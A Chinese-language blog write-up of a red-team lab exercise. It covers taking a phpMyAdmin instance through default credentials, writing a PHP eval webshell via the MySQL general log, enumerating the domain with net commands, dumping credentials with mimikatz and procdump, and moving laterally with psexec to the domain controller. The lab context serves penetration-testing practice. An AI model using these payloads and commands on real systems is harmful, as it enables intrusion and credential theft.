红队评估实战靶场(1)

释放双眼,带上耳机,听听看~!

0x00前言

[滑稽][滑稽]又是我,我又来发水文了,这几天打靶机打上瘾了,再来更新篇靶机的文章

0x01 靶机渗透

配置好靶机后,这里需要打开win7,来到c盘目录下启动phpstudy

启动完成后,就可以开始了,这里的要求是从web打点打进去。这里发现用的phpstudy应该是有后门的,可以用,phpstudy的exp来打一下。但是我们这里还是遵守一下规则,走个正常流程

这里就先打开御剑,扫描一下目录

有个beifen.rar的压缩包,猜想一下,应该是备份的拼音[手动滑稽][手动滑稽]

发现是个yxcms的网站,浏览器进行打开

果不其然就是个yxcms的网站,先对他进行保存,然后再来翻找一下phpinfo页面来保存一下他的绝对路径等会可能会用到

绝对路径:

C:/phpStudy/WWW

现在再来翻找一下phpmyadmin的目录。

来尝试一下弱口令 phpmyadmin的默认口令root/root,一试之下居然进去了,进入后的第一步肯定是写shell。看看能不能用into outfile来写shell。

into outfile 的写入条件是 “secure_file_priv”不能为null要为空才能进行写入。

先用sql语句来查看一下

SHOW VARIABLES LIKE “secure_file_priv”

显示为null 无法直接使用into outfile继续写入,那么这里还可以尝试使用日志来写shell

show variables like ‘%general%’;

查看日志是否开启

SET GLOBAL general_log=’on’

开启日志

SET GLOBAL general_log_file=’C:phpStudyWWWxxx.php’

设置日志的文章为php文件

这里得填2个反斜杠

SELECT ‘<?php eval($_POST[“cmd”]);?>’

然后就可以直接查询一句话就会写入到我们的日子里面,也就是xxx.php里面去。

访问xxx.php 看看文件是否存在

这里显示了一些查询内容,并没有显示一句话的代码出来说明,一句话已经被执行了

直接使用蚁剑连接

成功拿下webshell

查询一下当前权限

whoami

当前是个域管理员的权限,在来对该机器对一系列的信息收集

1.ipconfig /all  

2.systeminfo 
  
3.net config workstation 查看当前登录域 和用户登录信息

4.net time /domain  查看主域控时间

看到对方机器确实在域环境里面,dns的普遍会搭载在域控机器上,在于里面都是以dns去定位机器的位置的

这里还发现机器拥有2块网卡,一块网卡应该是开放web服务,而另一块则是与内网进行连通

再来判断该机器是否在域中

net localgroup administrators 

net user /domain

net group /domain

net group "Domain Admins" /domain

net group "Domain Controllers" /domain



目前就知道了域控名字为OWA

ping owa.god.org

ping一下域控的主机名直接拿到域控的ip,定位域控的位置

接下来就直接交给cs去完成了

使用http的隧道能直接上线

使用cs扫描52网段的主机存活

portscan 192.168.52.0/24 445 arp 200

机器上线的时候就发现没有uac能直接提权,运行mimikatz 抓取密码

域管理员的密码为:

[email protected]

尝试直接psexec进行登录到192.168.52.141的机器上面去,尝试过后发现并不能上线,可能是对方的机器http无法出网。

那么这里就直接添加一个smb的直连模式然后进行psexec的登陆

这里就直接上线成功了

这里能成功上线但是运行mimikatz抓取密码会失败,只能使用hashdump抓取密码

上传procdump 来抓取lsass进程,然后到本地来使用mimiktz解密

这里使用procdump和mimikatz都失败了,原因可能是03主机的缘故,不兼容。

既然抓不了明文密码的话,那么就把他个代理出来,然后使用采集到的密码去跑

前面采用ew开启socket的时候,也没做截图 就不演示了 ,尝试着使用http的reg正向代理看看能不能代理出来

但是我这使用reg代理的时候又出现问题了 ,不知道是我配置问题还是怎么样根本就连接不上,按理来说http是能出网的

接下来就尝试直接使用同样的方式使用administrator的用户密码去进行psexec登录 登录到域控

成功拿下域控机器

0x02 结尾

在后面的时间里面又去下载了个ladon,发现ladon的功能太强了,而且还能集成在cs里面,以前也是知道,没有真的去用过,内网中想要快速探测必不可少的工具还有个就nbtscan 这里因为就3台机器,就没必要在上传ntbtscan去扫描了。cs的功能虽然是很强大,也集成了很多横向移动的工具,但是都被阉割掉部分的功能。这靶机在做前就知道密码都那同样的一样密码,在后面的渗透就会变得没意思

渗透教程质量好文

Easy File Sharing Web Server 6.9 远程溢出漏洞

2020-6-15 21:41:49

漏洞

python c2 框架开发

2020-6-17 20:56:04

2 条回复 A文章作者 M管理员
  1. 难搞哦,写入php文件要权限的

个人中心
购物车
优惠劵
有新私信 私信列表
搜索